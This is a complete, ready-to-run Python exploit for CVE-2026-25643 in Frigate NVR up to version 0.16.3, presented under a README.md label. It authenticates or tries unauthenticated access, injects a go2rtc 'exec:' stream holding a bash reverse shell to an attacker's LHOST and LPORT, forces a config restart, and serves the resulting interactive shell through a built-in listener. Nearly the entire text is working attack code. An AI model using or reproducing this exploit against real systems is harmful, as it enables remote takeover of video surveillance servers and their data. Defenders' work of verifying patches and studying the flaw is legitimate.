README.md
Rendering markdown...
# Exploit Title: Frigate NVR <= 0.16.3 - RCE (Authenticated & Unauthenticated)
# Date: 2026-02-05
# Exploit Author: jduardo2704
# Vendor Homepage: https://frigate.video/
# Software Link: https://github.com/blakeblackshear/frigate
# Version: <= 0.16.3
# Tested on: Linux / Docker
# CVE: CVE-2026-25643
# Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
import requests
import argparse
import sys
import json
import urllib3
import yaml
import time
import socket
import threading
import select
import re
# Silence SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Colors
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
RESET = '\033[0m'
# Event to synchronize the listener with the exploit thread
exploit_ready = threading.Event()
def print_status(msg, color=BLUE, symbol="[*]"):
print(f"{color}{symbol} {msg}{RESET}")
def login_frigate(session, url, username, password):
try:
print_status(f"Authenticating as {username}...", BLUE)
res = session.post(f"{url}/api/login", json={"user": username, "password": password}, verify=False, timeout=10)
return res.status_code == 200
except:
return False
def get_config(session, url):
try:
res = session.get(f"{url}/api/config/raw", timeout=10)
content = res.text.strip()
if content.startswith('"'):
try:
config_raw = json.loads(content)
except:
config_raw = content
else:
config_raw = content
return yaml.safe_load(config_raw)
except:
return None
def send_payload(session, url, data):
final_yaml = yaml.dump(data)
try:
session.post(
f"{url}/api/config/save?save_option=restart",
data=final_yaml,
headers={"Content-Type": "text/plain"},
timeout=5
)
except:
pass
def inject_and_exploit(url, username, password, lhost, lport):
"""Function to run in background thread"""
session = requests.Session()
session.verify = False
# 1. AUTHENTICATION LOGIC
if username and password:
if not login_frigate(session, url, username, password):
print_status("Login failed with provided credentials.", RED, "[-]")
sys.exit(1)
print_status("Logged in successfully.", BLUE)
else:
print_status("No credentials provided. Trying unauthenticated access...", YELLOW)
# 2. CONFIG RETRIEVAL & VALIDATION
print_status("Fetching configuration...", BLUE)
config = get_config(session, url)
if not config or not isinstance(config, dict):
print_status("Failed to retrieve a valid configuration dictionary.", RED, "[-]")
print_status("Target might be authenticated or API is restricted.", RED, "[-]")
sys.exit(1)
# 3. PAYLOAD PREPARATION
try:
payload = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
# Inject go2rtc
if 'go2rtc' not in config or config['go2rtc'] is None: config['go2rtc'] = {}
if 'streams' not in config['go2rtc'] or config['go2rtc']['streams'] is None: config['go2rtc']['streams'] = {}
config['go2rtc']['streams']['cve_poc'] = [f"exec:{payload}"]
# Inject camera trigger
if 'cameras' not in config or config['cameras'] is None: config['cameras'] = {}
config['cameras']['cve_trigger'] = {
'ffmpeg': {'inputs': [{'path': 'rtsp://127.0.0.1:8554/cve_poc', 'roles': ['detect']}]},
'detect': {'enabled': False},
'audio': {'enabled': False},
'enabled': True
}
print_status("Payload injected into config structure.", GREEN, "[+]")
# 4. SIGNAL LISTENER TO START
exploit_ready.set()
time.sleep(5)
print_status("Sending malicious config & triggering restart...", YELLOW)
send_payload(session, url, config)
except Exception as e:
print_status(f"Error during payload injection: {e}", RED, "[-]")
sys.exit(1)
def shell_handler(lport):
"""Handles the incoming reverse shell connection"""
print_status("Waiting for validation...", BLUE)
if not exploit_ready.wait(timeout=20):
print_status("Timeout waiting for exploit thread validation.", RED, "[-]")
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(('0.0.0.0', int(lport)))
s.listen(1)
print_status(f"Validation OK. Listening on 0.0.0.0:{lport}...", GREEN, "[+]")
s.settimeout(60)
try:
conn, addr = s.accept()
print_status(f"Connection received from {addr[0]}!", GREEN, "[+]")
print(f"{YELLOW}--- SHELL ESTABLISHED ---\n{RESET}")
s.settimeout(None)
conn.settimeout(None)
while True:
r, _, _ = select.select([sys.stdin, conn], [], [])
if conn in r:
data = conn.recv(4096)
if not data: break
# CLEAN OUTPUT LOGIC
output = data.decode(errors='ignore')
# Remove annoying bash TTY errors using Regex
# Matches "bash: cannot set terminal process group (PID): Inappropriate ioctl..."
output = re.sub(r"bash: cannot set terminal process group \(\d+\): Inappropriate ioctl for device\r?\n?", "", output)
# Matches "bash: no job control in this shell"
output = output.replace("bash: no job control in this shell\r\n", "")
output = output.replace("bash: no job control in this shell\n", "")
sys.stdout.write(output)
sys.stdout.flush()
if sys.stdin in r:
cmd = sys.stdin.readline()
conn.send(cmd.encode())
except socket.timeout:
print_status("Exploit sent but no connection received (Timeout > 60s).", RED, "[-]")
except KeyboardInterrupt:
print_status("\nClosing connection.", RED)
except Exception as e:
print_status(f"Listener error: {e}", RED)
finally:
s.close()
def main():
parser = argparse.ArgumentParser(description="Frigate <= 0.16.3 RCE (Auto-Shell) - CVE-2026-25643")
parser.add_argument('-u', '--url', required=True, help="Target URL")
parser.add_argument('-U', '--username', required=False, help="Username (optional)")
parser.add_argument('-P', '--password', required=False, help="Password (optional)")
parser.add_argument('-lh', '--lhost', required=True, help="Your IP (LHOST)")
parser.add_argument('-lp', '--lport', required=True, help="Your Port (LPORT)")
args = parser.parse_args()
exploit_thread = threading.Thread(
target=inject_and_exploit,
args=(args.url.rstrip('/'), args.username, args.password, args.lhost, args.lport)
)
exploit_thread.daemon = True
exploit_thread.start()
shell_handler(args.lport)
if __name__ == "__main__":
main()